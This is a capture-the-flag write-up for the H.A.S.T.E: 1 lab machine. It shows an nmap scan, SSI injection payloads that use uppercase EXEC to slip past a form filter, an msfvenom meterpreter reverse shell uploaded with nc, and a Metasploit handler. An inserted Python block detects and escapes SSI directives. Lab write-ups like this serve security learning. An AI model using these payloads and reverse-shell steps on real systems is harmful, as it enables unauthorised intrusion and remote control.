I learned a new attack vector: SSI injection. Thanks.
- ch3rn0byl: we just started the haste one if you want to do it (00:28)
- H4v0k: boot it up amon , sleep is for the weak (00:31)
- ch3rn0byl: sleep is for the bitchesssssss (00:32)
- ch3rn0byl: fucking haste (02:38)
Note: if you want to learn more about Windows exploit development you can read ch3rn0byl's blog: here.
Name: H.A.S.T.E: 1
Release date: 13 Sep 2017
Web page: https://securityshards.wordpress.com/2017/09/13/new-h-a-s-t-e-hacking-challenge/
Aim: get any kind of shell in the system.
We can find the IP address of the system with
Nmap finds only one port open.

[email protected]:~/Desktop# nmap 192.168.1.46
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 08:38 CEST
Nmap scan report for yoda.home (192.168.1.46)
Host is up (0.029s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Nmap done: 1 IP address (1 host up) scanned in 61.85 seconds
[email protected]:~/Desktop#
With a quick enumeration of the structure of the website we find an SSI page where an ls command is executed, and several pages with the .shtml extension. If you google shtml you will find interesting documents and one attack vector.
Because the input of the HTTP form is not sanitised, we can execute commands on the system.
Request Body:
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

xxx=Offsec&feedback=<!--#EXEC cmd="whoami; id; pwd" -->
Note that the usual way to execute a command with SSI injection is the exec keyword rather than EXEC, but after a few tries it appears that the lowercase string exec is removed by the form validation in the PHP page, while the uppercase form goes through untouched.
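The filter behaviour described above (lowercase exec is stripped, uppercase EXEC survives) is the whole bug. The following is an added example, not code from the write-up or from the challenge: a hypothetical reproduction of that weak filter next to a case-insensitive detection check and an escaping mitigation, run over the page's own payload and a constructed benign input.

```python
import html
import re

# Constructed samples: the feedback value from the page's request body, a
# lowercase variant, and a benign comment. These are not from the challenge itself.
SAMPLES = {
    "benign": "Great challenge, thanks!",
    "uppercase_directive": '<!--#EXEC cmd="whoami; id; pwd" -->',
    "lowercase_directive": '<!--#exec cmd="id" -->',
}

# Any SSI directive opener followed by a directive name. Case-insensitive,
# because the page shows the target accepted the directive name in uppercase.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|include|echo|config|set|if|elif|else|endif|printenv|fsize|flastmod)\b",
    re.IGNORECASE,
)


def weak_filter(value: str) -> str:
    """Hypothetical reproduction of the observed behaviour: only the exact
    lowercase substring 'exec' is deleted, so 'EXEC' is left intact."""
    return value.replace("exec", "")


def contains_ssi_directive(value: str) -> bool:
    """Detection check: True if the string would still form an SSI directive."""
    return SSI_DIRECTIVE.search(value) is not None


def hardened_filter(value: str) -> str:
    """Mitigation: HTML-escape the input so '<!--#' can never reach the .shtml
    page as markup. Better still is not to echo user input into an SSI-enabled
    page at all (or to disable Includes for it); escaping is the minimum."""
    return html.escape(value, quote=True)


def audit(samples=SAMPLES):
    """Per sample: does a directive survive each filter? (weak: yes for EXEC)"""
    return {
        name: {
            "weak_still_executable": contains_ssi_directive(weak_filter(v)),
            "hardened_still_executable": contains_ssi_directive(hardened_filter(v)),
        }
        for name, v in samples.items()
    }
```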
From RCE to Reverse Shell
As usual, we generate a reverse shell with msfvenom:

[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
[email protected]:~/Desktop#
Then, we upload the reverse shell to the system.

#Attacker command
nc -nvv 192.168.1.46 1337 < rshell

#SSI injection command
<!--#EXEC cmd="/bin/nc -lvvp 1337 > /tmp/rshell" -->
We configure our handler:

[email protected]:~/Desktop# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.107:1337
msf exploit(handler) >
We make the file executable and run the reverse shell.

#Set permission to executable
<!--#EXEC cmd="chmod +x /tmp/rshell" -->

#Execute the reverse shell
<!--#EXEC cmd="/tmp/rshell" -->